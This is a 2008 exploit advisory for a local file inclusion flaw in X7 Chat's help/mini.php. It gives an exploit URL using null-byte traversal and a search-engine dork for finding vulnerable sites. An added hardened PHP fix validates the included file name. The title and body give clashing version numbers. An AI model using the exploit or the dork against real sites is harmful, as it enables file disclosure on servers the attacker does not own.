# Title : X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion Vulnerability
# Published : 2008-09-27
# Author : NoGe
====================================================================
[o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor : http://x7chat.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
====================================================================
[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");
[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]%00
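A hardened form of the include shown above, as an added example (not from the advisory or from X7 Chat's own code): it accepts only a plain file name, rejects NUL bytes, and confirms with realpath() that the resolved path stays inside the help directory. HELP_DIR and resolve_help_file() are hypothetical names, and PHP 7 or later is assumed.

```php
<?php
// Added illustration: hardened replacement for the include in help/mini.php.
// HELP_DIR and resolve_help_file() are hypothetical names, not X7 Chat's own.

// Same relative directory the original include() uses.
const HELP_DIR = './help';

/**
 * Map a user-supplied help_file value to a file inside $baseDir,
 * or return null if the value is not acceptable.
 */
function resolve_help_file($requested, $baseDir = HELP_DIR)
{
    // Only a non-empty string is acceptable (help_file[]=x arrives as an array).
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    // Reject NUL bytes outright: older PHP versions truncated paths at the first NUL.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    // Restrict to a plain file name: no slashes, no backslashes, no "..".
    if (!preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?\z/', $requested)) {
        return null;
    }
    // Canonicalise both paths and require the result to stay under the help directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_help_file($_GET['help_file'] ?? null);
if ($file === null) {
    http_response_code(404);
    exit('Help topic not found.');
}
include $file;
```

Where the set of help topics is fixed, replacing the pattern check with an explicit array of permitted file names is stricter still.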
[o] Dork
"powered by x7 chat"
====================================================================
[o] Greetz
MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke
====================================================================
# www.Syue.com [2008-09-27]